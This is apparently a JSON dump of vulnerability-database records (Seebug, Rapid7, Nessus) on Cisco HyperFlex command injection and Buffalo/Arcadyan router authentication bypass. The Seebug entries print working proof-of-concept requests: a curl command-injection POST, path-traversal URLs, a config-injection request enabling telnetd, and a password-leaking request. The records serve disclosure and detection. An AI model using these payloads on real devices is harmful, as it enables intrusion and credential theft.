"HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-23T00:00:00", "type": "checkpoint_advisories", "title": "Buffalo Routers Directory Traversal (CVE-2021-20090; CVE-2021-20091)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091"], "modified": "2021-08-23T00:00:00", "id": "CPAI-2021-0497", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-06-12T01:03:26", "description": "## NSClient++\n\n\n\nCommunity contributor Yann Castel has contributed an exploit module for NSClient++ which targets an authenticated command execution vulnerability. Users that are able to authenticate to the service as admin can leverage the external scripts feature to execute commands with SYSTEM level privileges. This allows the underlying server to be compromised. Castel is also working on another exploit module for NSClient++ which happens to be a local privilege escalation so stay tuned for more NSClient++ content.\n\n## REDIS Improvements\n\nCommunity member Smashery returned to improve the Framework\u2019s REDIS dumping capabilities. This week two bugs were fixed to ensure that REDIS data can be more easily accessed using the `auxiliary/gather/redis_extractor` module. This module has seen a number of improvements lately and is capable of dumping data from both authenticated and unauthenticated instances.\n\n## POST API Improvements\n\nGoogle Summer of Code student and community member pingport80 has been hard at work making a number of improvements to the POST API used by modules to interact with sessions. The bulk of the improvements have been focused on closing feature gaps in various scenarios. One excellent example of this is the new Process library that allows both shell and Meterpreter sessions to enumerate running processes on multiple platforms. This makes it easier for module developers to write content without worrying about the different capabilities of the various session types.\n\nPingport80 has also been testing various scenarios to find issues related to localization. This has involved finding instances where error messages that are assumed to be in English are used to determine various outcomes and updating them to function regardless of the underlying locale.\n\n## New module content (2)\n\n * [Cisco HyperFlex HX Data Platform Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15281>) by [wvu](<https://github.com/wvu-r7>), Mikhail Klyuchnikov, and Nikita Abramov, which exploits [CVE-2021-1498](<https://attackerkb.com/topics/V6mTqsTWkw/cve-2021-1498?referrer=blog>) \\- Added an exploit for [CVE-2021-1497](<https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497?referrer=msfReleaseNotes>)/[CVE-2021-1498](<https://attackerkb.com/topics/V6mTqsTWkw/cve-2021-1498?referrer=msfReleaseNotes>), a command injection in Cisco HyperFlex HX Data Platform.\n * [NSClient++ 0.5.2.35 - ExternalScripts Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/15305>) by [Yann Castel](<https://github.com/Hakyac>) and kindredsec - This module allows an attacker with knowledge of the admin password of NSClient++ 0.5.2.35 to start a privilege reverse shell, so long as the attacker has the admin password, and the NSClient++has both the web interface and ExternalScripts feature enabled.\n\n## Enhancements and features\n\n * [#15296](<https://github.com/rapid7/metasploit-framework/pull/15296>) from [pingport80](<https://github.com/pingport80>) \\- The `command_exists?` method inside `post/common.rb` has been updated to fall back to using the `which` command to check if a command exists on a target system if `command -v` fails to run successfully. This allows users to check whether a command exists or not on systems that might not contain a `command` command, such as ESXi.\n * [#15299](<https://github.com/rapid7/metasploit-framework/pull/15299>) from [todb-r7](<https://github.com/todb-r7>) \\- The CONTRIBUTING.md documentation has been updated to include additional information on how to request CVEs for vulnerabilities from Rapid7.\n\n## Bugs fixed\n\n * [#15257](<https://github.com/rapid7/metasploit-framework/pull/15257>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The ` lib/msf/core/post_mixin.rb` library has been updated to correctly check if missing Meterpreter command IDs are core command IDs or an extension command ID and provide appropriate feedback to end users about this incompatibility. This also fixes an issue where Meterpreter might complain that it couldn't load an extension but wouldn't display what the extension was.\n * [#15284](<https://github.com/rapid7/metasploit-framework/pull/15284>) from [pingport80](<https://github.com/pingport80>) \\- This fixes a localization-related issue in the `post/linux/gather/pptpd_chap_secrets` module. If the file is unreadable, Metasploit would treat the permission denied error as the contents.\n * [#15290](<https://github.com/rapid7/metasploit-framework/pull/15290>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- Invalid Meterpeter command requirements in mixins no longer raise a Runtime error.\n * [#15293](<https://github.com/rapid7/metasploit-framework/pull/15293>) from [smashery](<https://github.com/smashery>) \\- This fixes two bugs in the Redis extractor module. The first was an issue that would occur when a value was excessively large. The second was a race condition that could be encountered if the server was being actively used by a third-party.\n * [#15312](<https://github.com/rapid7/metasploit-framework/pull/15312>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Ensures that msfconsole now supports setting both `RHOST` and `RHOSTS` interchangeably for all scenarios and modules\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.47...6.0.48](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-06-03T10%3A14%3A41-05%3A00..2021-06-10T14%3A21%3A04%2B01%3A00%22>)\n * [Full diff 6.0.47...6.0.48](<https://github.com/rapid7/metasploit-framework/compare/6.0.47...6.0.48>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-06-11T19:51:35", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2021-06-11T19:51:35", "id": "RAPID7BLOG:23D7FEEF87EC80463CD4EDB1EA568128", "href": "https://blog.rapid7.com/2021/06/11/metasploit-wrap-up-116/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2021-07-24T10:24:58", "description": "# CVE-2021-1497 and/or CVE-2021-1498\n\nCommand injection in the `/storfs-asup` endpoint\u2019s `token` and `mode` parameters.\n\n## Patch\n\n```\n--- unpatched/web.xml\t2021-05-17 19:06:17.000000000 -0500\n+++ patched/web.xml\t2021-05-17 19:06:23.000000000 -0500\n@@ -69,17 +69,6 @@\n \t</servlet-mapping>\n\n \t<servlet>\n-\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n-\t\t<servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class>\n-\t\t<load-on-startup>1</load-on-startup>\n-\t</servlet>\n-\n-\t<servlet-mapping>\n-\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n-\t\t<url-pattern>/storfs-asup/*</url-pattern>\n-\t</servlet-mapping>\n-\n-\t<servlet>\n \t\t<servlet-name>Springpath Upgrade Image Upload Service</servlet-name>\n \t\t<servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class>\n \t</servlet>\n```\n\n## Vulnerability\n\n```\n protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n String action = request.getParameter(\"action\");\n if (action == null) {\n String msg = \"Action for the servlet need be specified.\";\n writeErrorResponse(response, msg);\n return;\n }\n try {\n String token = request.getParameter(\"token\");\n StringBuilder cmd = new StringBuilder();\n cmd.append(\"exec /bin/storfs-asup \");\n cmd.append(token);\n String mode = request.getParameter(\"mode\");\n cmd.append(\" \");\n cmd.append(mode);\n cmd.append(\" > /dev/null\");\n logger.info(\"storfs-asup cmd to run : \" + cmd);\n ProcessBuilder pb = new ProcessBuilder(new String[] { \"/bin/bash\", \"-c\", cmd.toString() });\n logger.info(\"Starting the storfs-asup now: \");\n long startTime = System.currentTimeMillis();\n Process p = pb.start();\n InputStream errStream = p.getErrorStream();\n String errMsg = FileUtils.readToString(errStream);\n int exitCode = p.waitFor();\n long timeTaken = System.currentTimeMillis() - startTime;\n logger.info(\"storfs-asup command completed in (\" + timeTaken + \" ) milliseconds, with exit code (\" + exitCode + \") and error message: \" + errMsg);\n errStream.close();\n OutputStream outStream = p.getOutputStream();\n outStream.flush();\n outStream.close();\n if (exitCode != 0)\n throw new Exception(errMsg);\n } catch (IOException ex) {\n logger.error(\"Failed to generate asup: \" + ex);\n } catch (Exception ie) {\n logger.error(\"Failed to run the /bin/storfs-asup command.\");\n } finally {\n logger.info(\"Done executing asup command. \");\n }\n }\n```\n\n## PoC\n\n```\nwvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'\n* Trying 192.168.123.133...\n* TCP_NODELAY set\n* Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)\n> POST /storfs-asup HTTP/1.1\n> Host: 192.168.123.133\n> User-Agent: curl/7.64.1\n> Accept: */*\n> Content-Length: 28\n> Content-Type: application/x-www-form-urlencoded\n>\n* upload completely sent off: 28 out of 28 bytes\n< HTTP/1.1 200 OK\n< Server: nginx/1.8.1\n< Date: Tue, 18 May 2021 00:54:26 GMT\n< Content-Length: 0\n< Connection: keep-alive\n< Front-End-Https: on\n<\n* Connection #0 to host 192.168.123.133 left intact\n* Closing connection 0\nwvu@kharak:~$\n```\n\n## IOCs\n\n```\n==> /var/log/nginx/access.log <==\n192.168.123.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.1\" 200 0 \"-\" \"curl/7.64.1\"\n\n==> /var/log/springpath/stBootstrapGuiBackend.log <==\n2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now:\n2021-05-18-00:54:26.017 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command.\n2021-05-18-00:54:26.020 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command.\n\n==> /var/log/tomcat7/catalina.out <==\n2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now:\n2021-05-18-00:54:26.017 INFO com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command.\n2021-05-18-00:54:26.020 INFO com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command.\n\n==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <==\n127.0.0.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.0\" 200 -\n```", "cvss3": {}, "published": "2021-05-20T00:00:00", "type": "seebug", "title": "Cisco HyperFlex HX \u672a\u6388\u6743\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff08CVE-2021-1497 CVE-2021-1498\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2021-05-20T00:00:00", "id": "SSV:99255", "href": "https://www.seebug.org/vuldb/ssvid-99255", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-11T13:47:42", "description": "Tenable has discovered multiple vulnerabilities in routers manufactured by Arcadyan.\n\nDuring the disclosure process for the issues discovered in the Buffalo routers, Tenable discovered that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying Arcadyan firmware. \n\nPlease note that CVE-2021-20091 and CVE-2021-20092 have only been confirmed on Buffalo WSR-2533 models.\n\nCVE-2021-20090 : Path Traversal\nCVSSv3 Base Score: 8.1\nCVSSv3 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\nA path traversal vulnerability in the web interfaces of networking devices manufactured by Arcadyan, including Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24, could allow unauthenticated remote attackers to bypass authentication.\nThis vulnerability has also been confirmed to affect the following devices\nnote: the firmware versions listed do not indicate the latest affected firmware versions, only the firmware versions on which the issue was confirmed.\nPlease contact the devices' respective vendors for more information.\n\n| Vendor | Device | Found on version |\n| :-----| ----: | :----: |\n| ADB | ADSL wireless IAD router | 1.26S-R-3P |\n| Arcadyan | ARV7519 | 00.96.00.96.617ES |\n| Arcadyan | VRV9517 | 6.00.17 build04 |\n| Arcadyan | VGV7519 | 3.01.116 |\n| Arcadyan | VRV9518 | 1.01.00 build44 |\n| ASMAX | BBR-4MG / SMC7908 ADSL | 0.08 |\n| ASUS | DSL-AC88U (Arc VRV9517) | 1.10.05 build502 |\n| ASUS | DSL-AC87VG (Arc VRV9510) | 1.05.18 build305 |\n| ASUS | DSL-AC3100 | 1.10.05 build503 |\n| ASUS | DSL-AC68VG | 5.00.08 build272 |\n| Beeline | Smart Box Flash | 1.00.13_beta4 |\n| British Telecom | WE410443-SA | 1.02.12 build02 |\n| Buffalo | WSR-2533DHPL2 | 1.02 |\n| Buffalo | WSR-2533DHP3 | 1.24 |\n| Buffalo | BBR-4HG | |\n| Buffalo | BBR-4MG | 2.08 Release 0002 |\n| Buffalo | WSR-3200AX4S | 1.1 |\n| Buffalo | WSR-1166DHP2 | 1.15 |\n| Buffalo | WXR-5700AX7S | 1.11 |\n| Deutsche Telekom | Speedport Smart 3 | 010137.4.8.001.0 |\n| HughesNet | HT2000W | 0.10.10 |\n| KPN | ExperiaBox V10A (Arcadyan VRV9517) | 5.00.48 build453 |\n| KPN | VGV7519 | 3.01.116 |\n| O2 | HomeBox 6441 | 1.01.36 |\n| Orange | LiveBox Fibra (PRV3399) | 00.96.00.96.617ES |\n| Orange | LiveBox Fibra (PRV3399) | 00.96.00.96.617ES |\n| Skinny | Smart Modem (Arcadyan VRV9517) | 6.00.16 build01 |\n| SparkNZ | Smart Modem (Arcadyan VRV9517) | 6.00.17 build04 |\n| Telecom (Argentina) | Arcadyan VRV9518VAC23-A-OS-AM | 1.01.00 build44 |\n| TelMex | PRV33AC | 1.31.005.0012 |\n| TelMex | VRV7006 | |\n| Telstra | Smart Modem Gen 2 (LH1000) | 0.13.01r |\n| Telus | WiFi Hub (PRV65B444A-S-TS) | v3.00.20 |\n| Telus | NH20A | 1.00.10debug build06 |\n| Verizon | Fios G3100 | 2.0.0.6 |\n| Vodafone | EasyBox | 904\t4.16 |\n| Vodafone | EasyBox 903 | 30.05.714 |\n| Vodafone | EasyBox 802 | 20.02.226 |\n\nProof of Concept:\n\nThe vulnerability exists due to a list of folders which fall under a \"bypass list\" for authentication. For most of the devices listed, that means that the vulnerability can be triggered by multiple paths. The simplest examples would be:\n\nFor a device in which http://<ip>/index.htm requires authentication, an attacker could access index.htm using the following paths:\n\nhttp://<ip>/images/..%2findex.htm\nhttp://<ip>/js/..%2findex.htm\nhttp://<ip>/css/..%2findex.htm\nTo have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal. Additionally, certain files (those found under /cgi/) require a csrf (named httoken on these devices) token and a valid Referer header which will cause an error if the referer includes the ..%2f traversal (which can be match/replaced as well). \n\nCVE-2021-20091 : Configuration File Injection\nCVSSv3 Base Score: 7.5\nCVSSv3 Vector: AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\nThe web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.\nProof of Concept:\nThe injection occurs in parameters which pass from apply_abstract.cgi to the device's global config file. Assuming the user is logged in (or, alternatively, the url can be changed to /images/..%2fapply_abstract.cgi, leveraging the path traversal), the following command could be used to inject a line into the configuration file which enables telnetd. \n\n```\ncurl --include -X POST http://<ip>/apply_abstract.cgi -H \"Referer: http://<ip>/ping.html\" --data \"action=start_ping&httoken=<valid httoken>&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=<ip>%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\"\n```\n\nThe %0A will be interpreted as a newline when the ping address is added to /tmp/etc/config/.glbcfg. When rebooted, a shell will be available on port 23.\nCVE-2021-20092 : Improper Access Control\nCVSSv3 Base Score: 5.9\nCVSSv3 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\nThe web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.\nProof of Concept:\n\nTo get a valid httoken, navigate to http://<ip of device>/loginerror.html in a modern browser (tested on chrome).\nOpen DevTools\nRun getToken() in the Console.\nCopy the token, and use it in the following command from a terminal:\n\n```\n$ curl --include \"http://192.168.11.1/cgi/cgi_i_filter.js?_tn=442853667\" -H \"Referer: http://192.168.11.1/loginerror.html\"\n\nHTTP/1.1 200 OK\nDate: Mon, 13 Jan 2020 15:24:03 GMT\nServer: Arcadyan httpd 1.0\nContent-type: application/x-javascript\nX-FRAME-OPTIONS: SAMEORIGIN\nConnection: close\n\n/*DEMO*/\nvar login_password = \u201c<admin password>\u201c;\n\naddCfg(\"lan_ipaddr\", 0, \"192.168.11.1\");\n```\n\nSolution\nCustomers should seek update and mitigation information from their respective vendors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "seebug", "title": "Buffalo\u548cArcadyan\u591a\u6b3e\u8def\u7531\u5668\u8ba4\u8bc1\u7ed5\u8fc7RCE\u7b49\u591a\u4e2a\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2021-08-11T00:00:00", "id": "SSV:99329", "href": "https://www.seebug.org/vuldb/ssvid-99329", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-18T15:29:12", "description": "The version of Cisco HyperFlex HX installed on the remote host is affected by multiple command injection vulnerabilities. An unauthenticated, remote attacker can exploit these to execute arbitrary commands on an affected system.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-05-13T00:00:00", "type": "nessus", "title": "Cisco HyperFlex HX Command Injection Vulnerabilities (cisco-sa-hyperflex-rce-TjjNrkpR)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:cisco:hyperflex_hx-series_software"], "id": "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR.NASL", "href": "https://www.tenable.com/plugins/nessus/149454", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149454);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-1497\", \"CVE-2021-1498\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvx36014\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvx36019\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvx37435\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-hyperflex-rce-TjjNrkpR\");\n script_xref(name:\"IAVA\", value:\"2021-A-0237\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Cisco HyperFlex HX Command Injection Vulnerabilities (cisco-sa-hyperflex-rce-TjjNrkpR)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Cisco HyperFlex HX installed on the remote host is affected by multiple command injection \nvulnerabilities. An unauthenticated, remote attacker can exploit these to execute arbitrary commands on an affected \nsystem.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c9228075\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvx36014\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvx36019\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvx37435\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug IDs CSCvx36014, CSCvx36019, CSCvx37435\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1497\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1498\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Cisco HyperFlex HX Data Platform Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(78);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:hyperflex_hx-series_software\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_hyperflex_web_api_detect.nbin\");\n script_require_keys(\"Host/OS/Cisco_HyperFlex_web_API\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:'Cisco HyperFlex', port:port);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n {'fixed_version':'4.0.2e'}, \n {'min_version':'4.5.0', 'fixed_version':'4.5.2a'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info, \n constraints:constraints, \n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:31:22", "description": "The remote web server hosted on the Buffalo router is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path.", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "Buffalo Router Path Traversal (CVE-2021-20090)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-20090"], "modified": "2023-05-24T00:00:00", "cpe": ["x-cpe:/o:buffalo:buffalo", "x-cpe:/h:buffalo:buffalo"], "id": "BUFFALO_CVE-2021-20090_PATH_TRAVERSAL.NBIN", "href": "https://www.tenable.com/plugins/nessus/154981", "sourceData": "Binary data buffalo_CVE-2021-20090_path_traversal.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:27:33", "description": "Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-08-04T00:00:00", "type": "nessus", "title": "Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2023-04-25T00:00:00", "cpe": ["x-cpe:/a:buffalo:buffalo"], "id": "BUFFALO_WSR_CVE_2021_20090.NASL", "href": "https://www.tenable.com/plugins/nessus/152198", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152198);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-20090\", \"CVE-2021-20091\", \"CVE-2021-20092\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n \n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could \n allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An \n authenticated remote attacker could leverage this vulnerability to alter device configuration, \n potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to \n sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's \nself-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2021-13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Vendor has released fixes for certain models. Contact vendor for more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20090\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:buffalo:buffalo\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 